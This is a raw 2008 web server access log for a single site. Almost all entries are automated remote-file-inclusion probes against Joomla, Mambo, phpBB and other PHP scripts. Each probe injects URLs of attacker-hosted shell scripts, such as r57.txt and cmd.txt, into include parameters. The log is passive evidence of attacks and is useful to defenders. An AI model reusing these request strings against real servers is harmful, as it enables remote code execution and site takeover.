74.6.7.182 - - [25/Mar/2008:06:50:47 -0700] "GET /logs/access_071026.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.0.140.2 - - [25/Mar/2008:06:51:30 -0700] "GET /logs/access_080117.log/tools/send_reminders.php?noSet=0&includedir=http://cdr.sugong.org/bbs//data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
124.0.140.2 - - [25/Mar/2008:06:51:30 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://cdr.sugong.org/bbs//data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
124.0.140.2 - - [25/Mar/2008:06:51:30 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://cdr.sugong.org/bbs//data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.193.228.130 - - [25/Mar/2008:06:51:36 -0700] "GET /logs/access_080218.log/config.php?confighttp://www.jef.at/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.228.130 - - [25/Mar/2008:06:51:36 -0700] "GET /config.php?confighttp://www.jef.at/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.228.130 - - [25/Mar/2008:06:51:36 -0700] "GET /logs/config.php?confighttp://www.jef.at/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:06:52:09 -0700] "GET /logs/access_080207.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:06:52:17 -0700] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:06:52:26 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.98.186 - - [25/Mar/2008:06:52:55 -0700] "GET //index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://escape.dynamicdesign.at//components/com_zoom/classes/iptc/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.246.98.186 - - [25/Mar/2008:06:52:55 -0700] "GET /logs//index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://escape.dynamicdesign.at//components/com_zoom/classes/iptc/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.133.95.209 - - [25/Mar/2008:06:53:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://200.78.235.178/dipcal2gen/claroline150/claroline/auth/ldap/pro/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
217.133.95.209 - - [25/Mar/2008:06:53:09 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://200.78.235.178/dipcal2gen/claroline150/claroline/auth/ldap/pro/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.225.214.179 - - [25/Mar/2008:06:53:19 -0700] "GET /logs//?mosConfig_absolute_path=http://www.elka.pw.edu.pl/ktmlpro/includes/ktedit/mic22?? HTTP/1.1" 200 40268 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.225.214.179 - - [25/Mar/2008:06:53:19 -0700] "GET //?mosConfig_absolute_path=http://www.elka.pw.edu.pl/ktmlpro/includes/ktedit/mic22?? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:54:38 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:54:38 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.193.228.130 - - [25/Mar/2008:06:57:10 -0700] "GET /logs/access_080207.log/config.php?confighttp://www.jef.at/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:06:57:54 -0700] "GET /logs/access_080221.log//modules/mod_mainmenu.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:06:57:55 -0700] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:06:57:55 -0700] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:58:13 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
193.51.215.1 - - [25/Mar/2008:06:58:34 -0700] "GET /logs/main/diagnostics-report-index.php?root_path=http://200.78.235.178/dipcal2gen/claroline150/claroline/auth/ldap/pro/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
193.51.215.1 - - [25/Mar/2008:06:58:34 -0700] "GET /main/diagnostics-report-index.php?root_path=http://200.78.235.178/dipcal2gen/claroline150/claroline/auth/ldap/pro/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:06:59:04 -0700] "GET /index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:07:00:57 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.48.181 - - [25/Mar/2008:07:01:06 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.86.48.181 - - [25/Mar/2008:07:01:06 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
84.40.17.23 - - [25/Mar/2008:07:01:08 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
84.40.17.23 - - [25/Mar/2008:07:01:08 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
88.191.36.148 - - [25/Mar/2008:07:02:19 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.evilc0der.com/r57.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.36.148 - - [25/Mar/2008:07:02:19 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.evilc0der.com/r57.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.36.148 - - [25/Mar/2008:07:02:20 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.evilc0der.com/r57.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:02:32 -0700] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:02:32 -0700] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:02:32 -0700] "GET //class/class.dashboard_lms.php?where_framework=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:02:32 -0700] "GET //class/class.dashboard_lms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:02:32 -0700] "GET /logs//class/class.dashboard_lms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:02:32 -0700] "GET /logs//class/class.dashboard_lms.php?where_framework=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:07:02:46 -0700] "GET /main.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [25/Mar/2008:07:02:57 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:07:03:08 -0700] "GET /logs/access_080207.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:07:03:09 -0700] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:07:03:09 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:03:22 -0700] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:03:23 -0700] "GET //class/class.dashboard_lms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:03:23 -0700] "GET /logs//class/class.dashboard_lms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:03:23 -0700] "GET /logs/access.log//common/db.php?commonpath=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:03:23 -0700] "GET //common/db.php?commonpath=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:03:23 -0700] "GET /logs//common/db.php?commonpath=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.220.130.185 - - [25/Mar/2008:07:04:30 -0700] "GET /logs//index.php?option=com_forum&Itemid=func=post&do=quote&replyto=&mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
62.220.130.185 - - [25/Mar/2008:07:04:30 -0700] "GET //index.php?option=com_forum&Itemid=func=post&do=quote&replyto=&mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
84.40.17.23 - - [25/Mar/2008:07:04:52 -0700] "GET //index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
84.40.17.23 - - [25/Mar/2008:07:04:52 -0700] "GET /logs//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:07:05:42 -0700] "GET /logs/access_080312.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:07:06:35 -0700] "GET /logs/access_080312.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.7.194 - - [25/Mar/2008:07:06:47 -0700] "GET /logs//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
87.230.7.194 - - [25/Mar/2008:07:06:53 -0700] "GET //index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
85.214.18.47 - - [25/Mar/2008:07:07:23 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.214.18.47 - - [25/Mar/2008:07:07:23 -0700] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:07:07:29 -0700] "GET /logs/access_080118.log/index2.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:07:07:29 -0700] "GET /index2.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:07:07:29 -0700] "GET /logs/index2.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:07:08:05 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:07:08:07 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:07:08:10 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:07:08:12 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:08:36 -0700] "GET /logs/access.log//class/class.dashboard_lms.php?where_framework=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:08:41 -0700] "GET /logs/access.log//class/class.dashboard_lms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:07:08:54 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:07:08:54 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.6.17.233 - - [25/Mar/2008:07:09:39 -0700] "GET /logs/access_071116.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.34 - - [25/Mar/2008:07:09:54 -0700] "GET /logs/access_071217.log HTTP/1.0" 200 231335 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:07:11:08 -0700] "GET //index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:07:11:09 -0700] "GET /logs/access_080124.log//tools/send_reminders.php?noSet=0&includedir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.170 - - [25/Mar/2008:07:11:24 -0700] "GET /logs/access_080127.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:11:29 -0700] "GET /logs/access.log//class/class.dashboard_lms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:07:14:37 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:07:14:38 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:07:14:56 -0700] "GET /logs/access_080224.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:07:15:01 -0700] "GET /logs/access.log//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:07:15:01 -0700] "GET //index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:07:15:02 -0700] "GET /logs//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:07:15:20 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.236.194.235 - - [25/Mar/2008:07:15:20 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://channels.dal.net/irwan/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
87.236.194.235 - - [25/Mar/2008:07:15:20 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://channels.dal.net/irwan/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:07:15:25 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:15:57 -0700] "GET //component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:15:58 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:07:16:14 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:16:55 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:16:55 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:07:16:57 -0700] "GET /logs/access_080201.log/index.php?subpage=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:07:16:57 -0700] "GET /index.php?subpage=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:07:16:58 -0700] "GET /logs/index.php?subpage=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.88.116.153 - - [25/Mar/2008:07:17:07 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
203.88.116.153 - - [25/Mar/2008:07:17:07 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:17:23 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:17:24 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:17:36 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:17:36 -0700] "GET /index1.php?menu=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
